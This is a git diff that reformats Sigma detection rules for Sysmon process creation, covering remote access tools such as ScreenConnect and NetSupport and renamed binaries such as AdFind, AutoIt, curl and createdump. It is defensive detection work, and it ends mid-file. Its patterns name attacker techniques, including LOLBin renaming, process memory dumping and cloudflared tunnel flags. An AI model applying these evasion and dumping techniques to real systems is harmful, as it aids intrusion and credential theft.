b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml index e07c4656e..0f0181526 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml @@ -1,18 +1,10 @@ title: Remote Access Tool - GoToAssist Execution id: b6d98a4f-cef0-4abf-bbf6-24132854a83d status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows author: frack113 @@ -30,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: GoTo Opener - - Product: GoTo Opener - - Company: LogMeIn, Inc. + - Description: GoTo Opener + - Product: GoTo Opener + - Company: LogMeIn, Inc. condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml index 04eec75fa..0f8db7d7d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml @@ -1,18 +1,10 @@ title: Remote Access Tool - LogMeIn Execution id: d85873ef-a0f8-4c48-a53a-6b621f11729d status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows author: frack113 @@ -30,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: LMIGuardianSvc - - Product: LMIGuardianSvc - - Company: LogMeIn, Inc. + - Description: LMIGuardianSvc + - Product: LMIGuardianSvc + - Company: LogMeIn, Inc. condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml index 713ae61ff..85ae4c7ed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml @@ -1,18 +1,10 @@ title: Remote Access Tool - NetSupport Execution id: 758ff488-18d5-4cbe-8ec4-02b6285a434f status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md author: frack113 @@ -30,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: NetSupport Client Configurator - - Product: NetSupport Remote Control - - Company: NetSupport Ltd - - OriginalFileName: PCICFGUI.EXE + - Description: NetSupport Client Configurator + - Product: NetSupport Remote Control + - Company: NetSupport Ltd + - OriginalFileName: PCICFGUI.EXE condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml index bb577804c..a6718570b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - NetSupport Execution From Unusual Location id: 37e8d358-6408-4853-82f4-98333fca7014 status: test -description: Detects execution of client32.exe (NetSupport RAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \client32.exe - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e + - Image|endswith: \client32.exe + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=a9d50692e95b79723f3e76fcf70d023e filter: Image|startswith: - C:\Program Files\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml index bfa718bfa..c379568c3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - RURAT Execution From Unusual Location id: e01fa958-6893-41d4-ae03-182477c5e77d status: test -description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location - (outside of 'C:\Program Files') +description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \rutserv.exe - - \rfusclient.exe - - Product: Remote Utilities + - Image|endswith: + - \rutserv.exe + - \rfusclient.exe + - Product: Remote Utilities filter: Image|startswith: - C:\Program Files\Remote Utilities diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml index 55b27fe63..02c41ce04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml @@ -1,18 +1,10 @@ title: Remote Access Tool - ScreenConnect Execution id: 57bff678-25d1-4d6c-8211-8ca106d12053 status: test -description: 'An adversary may use legitimate desktop support and remote access software, - such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive - command and control channel to target systems within networks. - - These services are commonly used as legitimate technical support software, and - may be allowed by application control within a target environment. - - Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared - with other legitimate software commonly used by adversaries. (Citation: Symantec - Living off the Land) - - ' +description: | + An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. + These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. + Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows author: frack113 @@ -30,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: ScreenConnect Service - - Product: ScreenConnect - - Company: ScreenConnect Software + - Description: ScreenConnect Service + - Product: ScreenConnect + - Company: ScreenConnect Software condition: process_creation and selection falsepositives: - Legitimate usage of the tool diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml index 52c2ede7f..7502f7cdf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Suspicious Execution id: 75bfe6e6-cd8e-429e-91d3-03921e1d7962 status: test -description: Detects ScreenConnect program starts that establish a remote access to - that system (not meeting, not remote support) +description: Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support) references: - https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - e=Access& - y=Guest& - '&p=' diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml index 9f7ab46f1..8ce7ae7fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml @@ -1,8 +1,7 @@ title: Remote Access Tool - ScreenConnect Backstage Mode Anomaly id: 7b582f1a-b318-4c6a-bf4e-66fe49bf55a5 status: test -description: Detects suspicious sub processes started by the ScreenConnect client - service, which indicates the use of the so-called Backstage mode +description: Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode references: - https://www.mandiant.com/resources/telegram-malware-iranian-espionage - https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml index 79d887aa7..70c70e65a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml @@ -20,13 +20,14 @@ detection: selection_parent: ParentImage|endswith: \ScreenConnect.ClientService.exe selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: \TEMP\ScreenConnect\ + # Example: + # CommandLine: "cmd.exe" /c "C:\Windows\TEMP\ScreenConnect\23.6.8.8644\3c41d689-bbf5-4216-b2f4-ba8fd6192c25run.cmd" + CommandLine|contains: \TEMP\ScreenConnect\ condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily - used. + - Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used. level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml index 66749424b..124e9c6cf 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml @@ -1,9 +1,7 @@ title: Discovery of a System Time id: b243b280-65fe-48df-ba07-6ddea7646427 status: test -description: Identifies use of various commands to query a systems time. This technique - may be used before executing a scheduled task or to discover the time zone of - a target system. +description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. references: - https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md @@ -25,13 +23,12 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: time + CommandLine|contains: time selection_w32tm: Image|endswith: \w32tm.exe - CommandLine|contains: tz + CommandLine|contains: tz condition: process_creation and (1 of selection_*) falsepositives: - - Legitimate use of the system utilities to discover system time for legitimate - reason + - Legitimate use of the system utilities to discover system time for legitimate reason level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml index 6fd8d68fd..f4929a3a1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_adfind.yml @@ -1,9 +1,7 @@ title: Renamed AdFind Execution id: df55196f-f105-44d3-a675-e9dfb6cc2f2b status: test -description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen - across majority of breaches. It is used to domain trust discovery to plan out - subsequent steps in the attack chain. +description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain. references: - https://www.joeware.net/freetools/tools/adfind/ - https://thedfirreport.com/2020/05/08/adfind-recon/ @@ -29,7 +27,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes @@ -50,12 +48,12 @@ detection: - computers_active - computers_pwdnotreqd selection_2: - - Imphash: - - bca5675746d13a1f246e2da3c2217492 - - 53e117a96057eaf19c41380d0e87f1c2 - - Hashes|contains: - - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 - - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 + - Imphash: + - bca5675746d13a1f246e2da3c2217492 + - 53e117a96057eaf19c41380d0e87f1c2 + - Hashes|contains: + - IMPHASH=BCA5675746D13A1F246E2DA3C2217492 + - IMPHASH=53E117A96057EAF19C41380D0E87F1C2 selection_3: OriginalFileName: AdFind.exe filter: diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml index c269d93bc..41ea2dfa1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml @@ -1,8 +1,7 @@ title: Renamed AutoHotkey.EXE Execution id: 0f16d9cf-0616-45c8-8fad-becc11b5a41c status: test -description: Detects execution of a renamed autohotkey.exe binary based on PE metadata - fields +description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields references: - https://www.autohotkey.com/download/ - https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/ @@ -19,25 +18,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: AutoHotkey - - Description|contains: AutoHotkey - - OriginalFileName: - - AutoHotkey.exe - - AutoHotkey.rc + - Product|contains: AutoHotkey + - Description|contains: AutoHotkey + - OriginalFileName: + - AutoHotkey.exe + - AutoHotkey.rc filter: - - Image|endswith: - - \AutoHotkey.exe - - \AutoHotkey32.exe - - \AutoHotkey32_UIA.exe - - \AutoHotkey64.exe - - \AutoHotkey64_UIA.exe - - \AutoHotkeyA32.exe - - \AutoHotkeyA32_UIA.exe - - \AutoHotkeyU32.exe - - \AutoHotkeyU32_UIA.exe - - \AutoHotkeyU64.exe - - \AutoHotkeyU64_UIA.exe - - Image|contains: \AutoHotkey + - Image|endswith: + - \AutoHotkey.exe + - \AutoHotkey32.exe + - \AutoHotkey32_UIA.exe + - \AutoHotkey64.exe + - \AutoHotkey64_UIA.exe + - \AutoHotkeyA32.exe + - \AutoHotkeyA32_UIA.exe + - \AutoHotkeyU32.exe + - \AutoHotkeyU32_UIA.exe + - \AutoHotkeyU64.exe + - \AutoHotkeyU64_UIA.exe + - Image|contains: \AutoHotkey condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml index 5ca275fd4..1b681f476 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_autoit.yml @@ -1,15 +1,10 @@ title: Renamed AutoIt Execution id: f4264e47-f522-4c38-a420-04525d5b880f status: experimental -description: 'Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. - - AutoIt is a scripting language and automation tool for Windows systems. While - primarily used for legitimate automation tasks, it can be misused in cyber attacks. - - Attackers can leverage AutoIt to create and distribute malware, including keyloggers, - spyware, and botnets. A renamed AutoIt executable is particularly suspicious. - - ' +description: | + Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. + AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. + Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious. references: - https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w - https://www.autoitscript.com/site/ @@ -28,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - ' /AutoIt3ExecuteScript' - ' /ErrorStdOut' selection_2: - - Imphash: - - fdc554b3a8683918d731685855683ddf - - cd30a61b60b3d60cecdb034c8c83c290 - - f8a00c72f2d667d2edbb234d0c0ae000 - - Hashes|contains: - - IMPHASH=FDC554B3A8683918D731685855683DDF - - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 - - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 + - Imphash: + - fdc554b3a8683918d731685855683ddf # AutoIt v2 - doesn't cover all binaries + - cd30a61b60b3d60cecdb034c8c83c290 # AutoIt v2 - doesn't cover all binaries + - f8a00c72f2d667d2edbb234d0c0ae000 # AutoIt v3 - doesn't cover all binaries + - Hashes|contains: + - IMPHASH=FDC554B3A8683918D731685855683DDF # AutoIt v2 - doesn't cover all binaries + - IMPHASH=CD30A61B60B3D60CECDB034C8C83C290 # AutoIt v2 - doesn't cover all binaries + - IMPHASH=F8A00C72F2D667D2EDBB234D0C0AE000 # AutoIt v3 - doesn't cover all binaries selection_3: OriginalFileName: - AutoIt3.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml index f2cbe5299..f67b2ef73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary.yml @@ -1,17 +1,15 @@ title: Potential Defense Evasion Via Binary Rename id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: similar + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: similar status: test -description: Detects the execution of a renamed binary often used by attackers or - malware leveraging new Sysmon OriginalFileName datapoint. +description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. references: - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process -author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, - Andreas Hunkeler (@Karneades) +author: Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades) date: 2019/06/15 modified: 2023/01/18 tags: @@ -49,7 +47,6 @@ detection: - \InstallUtil.exe condition: process_creation and (selection and not filter) falsepositives: - - Custom applications use renamed binaries adding slight change to binary name. - Typically this is easy to spot and add to whitelist + - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml index 3f2290822..034089280 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml @@ -1,19 +1,18 @@ title: Potential Defense Evasion Via Rename Of Highly Relevant Binaries id: 0ba1da6d-b6ce-4366-828c-18826c9de23e related: - - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 - type: similar - - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed - type: derived - - id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 - type: obsoletes - - id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 - type: obsoletes - - id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 - type: obsoletes + - id: 36480ae1-a1cb-4eaa-a0d6-29801d7e9142 + type: similar + - id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed Rundll32 Specific + type: derived + - id: a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2 # Renamed PsExec + type: obsoletes + - id: d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20 # Renamed PowerShell + type: obsoletes + - id: d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2 # Renamed Rundll32 + type: obsoletes status: test -description: Detects the execution of a renamed binary often used by attackers or - malware leveraging new Sysmon OriginalFileName datapoint. +description: Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. references: - https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html - https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html @@ -36,29 +35,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: Execute processes remotely - - Product: Sysinternals PsExec - - Description|startswith: - - Windows PowerShell - - pwsh - - OriginalFileName: - - certutil.exe - - cmstp.exe - - cscript.exe - - mshta.exe - - msiexec.exe - - powershell_ise.exe - - powershell.exe - - psexec.c - - psexec.exe - - psexesvc.exe - - pwsh.dll - - reg.exe - - regsvr32.exe - - rundll32.exe - - WerMgr - - wmic.exe - - wscript.exe + - Description: Execute processes remotely + - Product: Sysinternals PsExec + - Description|startswith: + - Windows PowerShell + - pwsh + - OriginalFileName: + - certutil.exe + - cmstp.exe + - cscript.exe + - mshta.exe + - msiexec.exe + - powershell_ise.exe + - powershell.exe + - psexec.c # old versions of psexec (2016 seen) + - psexec.exe + - psexesvc.exe + - pwsh.dll + - reg.exe + - regsvr32.exe + - rundll32.exe + - WerMgr + - wmic.exe + - wscript.exe filter: Image|endswith: - \certutil.exe @@ -80,9 +79,7 @@ detection: - \wscript.exe condition: process_creation and (selection and not filter) falsepositives: - - Custom applications use renamed binaries adding slight change to binary name. - Typically this is easy to spot and add to whitelist - - PsExec installed via Windows Store doesn't contain original filename field (False - negative) + - Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist + - PsExec installed via Windows Store doesn't contain original filename field (False negative) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml index 65d04b747..9fd4733f6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml @@ -1,8 +1,7 @@ title: Renamed BrowserCore.EXE Execution id: 8a4519e8-e64a-40b6-ae85-ba8ad2177559 status: test -description: Detects process creation with a renamed BrowserCore.exe (used to extract - Azure tokens) +description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) references: - https://twitter.com/mariuszbit/status/1531631015139102720 author: Max Altgelt (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml index 99f6ec451..fd4697320 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml @@ -22,23 +22,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cleanup: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' selection_tunnel: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' - '-token ' selection_accountless: - CommandLine|contains|all: + CommandLine|contains|all: - -url - tunnel selection_hashes: diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml index 97471381f..b259df344 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_createdump.yml @@ -1,11 +1,10 @@ title: Renamed CreateDump Utility Execution id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e related: - - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 - type: similar + - id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 + type: similar status: test -description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to - dump process memory +description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory references: - https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ - https://twitter.com/bopin2020/status/1366400799199272960 @@ -27,14 +26,14 @@ detection: selection_pe: OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - - CommandLine|contains|all: - - ' -u ' - - ' -f ' - - .dmp - - CommandLine|contains|all: - - ' --full ' - - ' --name ' - - .dmp + - CommandLine|contains|all: + - ' -u ' # Short version of '--full' + - ' -f ' # Short version of '--name' + - .dmp + - CommandLine|contains|all: + - ' --full ' # Short version of '--full' + - ' --name ' # Short version of '--name' + - .dmp filter: Image|endswith: \createdump.exe condition: process_creation and (1 of selection_* and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml index d2477ddc8..9ef5fe327 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_curl.yml @@ -1,8 +1,7 @@ title: Renamed CURL.EXE Execution id: 7530cd3d-7671-43e3-b209-976966f6ea48 status: experimental -description: Detects the execution of a renamed "CURL.exe" binary based on the PE - metadata fields +description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields references: - https://twitter.com/Kostastsale/status/1700965142828290260 author: X__Junior (Nextron Systems) @@ -22,8 +21,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: curl.exe - - Description: The curl executable + - OriginalFileName: curl.exe + - Description: The curl executable filter_main_img: Image|contains: \curl condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml index fb7214d4e..96604d07a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml @@ -1,8 +1,7 @@ title: Renamed ZOHO Dctask64 Execution id: 340a090b-c4e9-412e-bb36-b4b16fe96f9b status: test -description: Detects a renamed dctask64.exe used for process injection, command execution, - process creation with a signed binary by ZOHO Corporation +description: Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation references: - https://twitter.com/gN3mes1s/status/1222088214581825540 - https://twitter.com/gN3mes1s/status/1222095963789111296 diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml index 8dac42201..df042e868 100644 --- 